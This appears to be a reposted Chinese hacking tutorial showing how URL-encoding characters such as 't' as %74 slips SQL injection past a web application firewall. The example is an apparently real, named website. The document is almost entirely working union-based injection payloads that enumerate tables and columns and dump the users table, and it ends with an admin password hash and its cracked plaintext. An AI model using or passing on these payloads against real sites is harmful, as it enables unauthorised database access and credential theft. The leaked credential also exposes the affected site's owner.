|
案例解读怎样运用URL编号绕开WAF防范
WAF
SQL引入点
http://www.magrabiyemen.com/contents.php?id=3
字符串数为4
http://www.magrabiyemen.com/contents.php?id=3 order by 4
显视位为4
http://www.magrabiyemen.com/contents.php?id=3 union select 1,2,3,4
显视基本资料没问题
URL编号绕开WAF
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())
暴表的当时出現not acceptable
URL编号绕开WAF
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
试着绕开,失败,仍然回到图中如图
http://www.magrabiyemen.com/contents.php?id=3 /*!12345UNION*/ /*!12345SELECT*/ 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
应用URL编号完成绕开(t历经URL编号后为%74)
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()
URL编号绕开WAF
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)
URL编号绕开WAF
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users
URL编号绕开WAF
admin:ea4ce35c2860112178e8ae2285579919
破译出去为:admin/123456789987654321
版权声明
1、转载或引用本网站内容须注明原网址,并标明本网站网址(http://www.cn-sl.com)。
2、转载或引用本网站中的署名文章,请按规定向原作者支付稿酬。
3、对于不当转载或引用本网站内容而引起的民事纷争、行政处理或其他损失,本网站不承担责任。
4、对不遵守本声明或其他违法、恶意使用本网站内容者,本网站保留追究其法律责任的权利。
唯一网址: http://www.cn-sl.com/hack-116-1-1.html
|
|